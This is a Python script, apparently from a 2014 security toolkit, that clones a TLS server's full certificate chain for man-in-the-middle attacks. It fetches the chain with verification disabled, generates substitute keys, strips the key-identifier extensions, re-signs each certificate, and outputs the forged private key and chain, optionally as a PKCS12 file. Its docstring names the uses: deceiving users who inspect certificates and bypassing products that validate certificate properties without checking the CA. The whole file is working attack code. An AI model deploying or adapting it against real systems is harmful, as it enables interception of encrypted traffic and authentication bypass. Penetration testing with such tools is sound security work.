#!/usr/bin/env python3 #-*- mode: Python;-*- # # Requires Python 3+ ''' An experimental script which attempts to clone a server certificate's entire certificate chain, ideally altering only the keys and signatures along the way. This is useful in a few man-in-the-middle attack situations, including: - You swap out certificates on a user and the manually inspect the certificate properties before accepting them. Identical properties are more convincing. - A product includes special-purpose certificate properties that are validated with custom procedures (e.g. client user name, product serial number, ...). If these properties are validated but the certificate's CA isn't, then cloning the full set of certificate properties is essential to bypass the authentication. Currently, this script is somewhat limited and buggy, but will hopefully improve over time. Patches welcome! Copyright (C) 2014 Blindspot Security LLC Author: Timothy D. Morgan This program is free software: you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License, version 3, as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . ''' import sys import argparse import traceback import socket try: import OpenSSL from OpenSSL import SSL except: sys.stderr.write('ERROR: Could not locate pyOpenSSL module. Under Debian-based systems, try:\n') sys.stderr.write(' # apt-get install python3-openssl\n') sys.stderr.write('NOTE: pyOpenSSL version 0.14 or later is required!\n') sys.exit(2) def createClientContext(): tlsClientContext = SSL.Context(SSL.SSLv3_METHOD) tlsClientContext.set_verify(SSL.VERIFY_NONE, (lambda a,b,c,d,e: True)) return tlsClientContext def fetchCertificateChain(host, port): serverSock = socket.socket() serverSock.connect((host,port)) try: server = SSL.Connection(createClientContext(), serverSock) server.set_connect_state() server.do_handshake() except Exception as e: print("Exception during handshake with server: ") traceback.print_exc(e) return None return server.get_peer_cert_chain() def normalizeCertificateName(cert_name): n = cert_name.get_components() n.sort() return tuple(n) def normalizeCertificateChain(chain): # Organize certificates by subject and issuer for quick lookups subject_table = {} issuer_table = {} for c in chain: subject_table[normalizeCertificateName(c.get_subject())] = c issuer_table[normalizeCertificateName(c.get_issuer())] = c # Now find root or highest-level intermediary root = None for c in chain: i = normalizeCertificateName(c.get_issuer()) s = normalizeCertificateName(c.get_subject()) if (i == s) or (i not in subject_table): if root != None: sys.stderr.write("WARN: Multiple root certificates found or broken certificate chain detected.") else: # Go with the first identified "root", since that's more likely to link up with the server cert root = c # Finally, build the chain from the top-down in the correct order new_chain = [] nxt = root while nxt != None: new_chain = [nxt] + new_chain s = normalizeCertificateName(nxt.get_subject()) nxt = issuer_table.get(s) return new_chain def genFakeKey(certificate): fake_key = OpenSSL.crypto.PKey() old_pubkey = certificate.get_pubkey() fake_key.generate_key(old_pubkey.type(), old_pubkey.bits()) return fake_key def getDigestAlgorithm(certificate): # XXX: ugly hack because pyopenssl API for this is limited if b'md5' in certificate.get_signature_algorithm(): return 'md5' else: return 'sha1' def deleteExtension(certificate, index): import cffi from cffi import FFI ffi = FFI() ffi.cdef('''void* X509_delete_ext(void* x, int loc);''') libssl = ffi.dlopen('libssl.so') ext = libssl.X509_delete_ext(certificate._x509, index) #XXX: supposed to free ext here def removePeskyExtensions(certificate): #for index in range(0,certificate.get_extension_count()): # e = certificate.get_extension(index) # print("extension %d: %s\n" % (index, e.get_short_name()), e) index = 0 while index < certificate.get_extension_count(): e = certificate.get_extension(index) if e.get_short_name() in (b'subjectKeyIdentifier', b'authorityKeyIdentifier'): deleteExtension(certificate, index) #XXX: would be nice if each of these extensions were re-added with appropriate values index -= 1 index += 1 #for index in range(0,certificate.get_extension_count()): # e = certificate.get_extension(index) # print("extension %d: %s\n" % (index, e.get_short_name()), e) def genFakeCertificateChain(cert_chain): ret_val = [] cert_chain.reverse() # start with highest level authority c = cert_chain[0] i = normalizeCertificateName(c.get_issuer()) s = normalizeCertificateName(c.get_subject()) if s != i: # XXX: consider retrieving root locally and including a forged version instead c.set_issuer(c.get_subject()) k = genFakeKey(c) c.set_pubkey(k) removePeskyExtensions(c) c.sign(k, getDigestAlgorithm(c)) ret_val.append(c) prev = k for c in cert_chain[1:]: k = genFakeKey(c) c.set_pubkey(k) removePeskyExtensions(c) c.sign(prev, getDigestAlgorithm(c)) prev = k ret_val.append(c) ret_val.reverse() return k,ret_val parser = argparse.ArgumentParser( description="An experimental script which attempts to clone an SSL server's" " entire certificate chain, ideally altering only the keys and signatures" " along the way. The script prints results to stdout, starting with a PKCS7 (PEM)" " key (the fake server private key) followed by the newly forged certificate" " chain, also in PEM format. (The new intermediate and root private keys are" " not currently printed, but will likely be somehow available in a future" " version.)") parser.add_argument('host', nargs=1, default=None, help='IP address or host name of server') parser.add_argument('port', nargs='?', type=int, default=443, help='TCP port number of SSL service (default: 443)') parser.add_argument( '--p12', dest='p12_filename', type=str, required=False, default=None, help='If specified, a PKCS12 file will be written with the generated certificates' ' and server key (in addition to normal PKCS7 output). NOTE: the file specified' ' will be overwritten without prompting if it already exists.') parser.add_argument( '--p12password', dest='p12_password', type=str, required=False, default='bletchley', help='If specified along with the --p12 argument, the PKCS12 file will use this password' ' to encrypt the server private key. (Otherwise, the password "bletchley" is used).') options = parser.parse_args() #print("REAL CHAIN:") chain = fetchCertificateChain(options.host[0],options.port) #for c in chain: # print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8')) #chain = normalizeCertificateChain(chain) #for c in chain: # print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8')) #print("FAKE KEY AND CHAIN:") fake_key, fake_chain = genFakeCertificateChain(chain) print(OpenSSL.crypto.dump_privatekey(OpenSSL.crypto.FILETYPE_PEM, fake_key).decode('utf-8')) for c in fake_chain: print(OpenSSL.crypto.dump_certificate(OpenSSL.crypto.FILETYPE_PEM, c).decode('utf-8')) if options.p12_filename: p12_file = open(options.p12_filename, 'w+b') p12 = OpenSSL.crypto.PKCS12() p12.set_ca_certificates(fake_chain[1:]) p12.set_privatekey(fake_key) p12.set_certificate(fake_chain[0]) p12_file.write(p12.export(passphrase=options.p12_password.encode('utf-8'))) p12_file.close()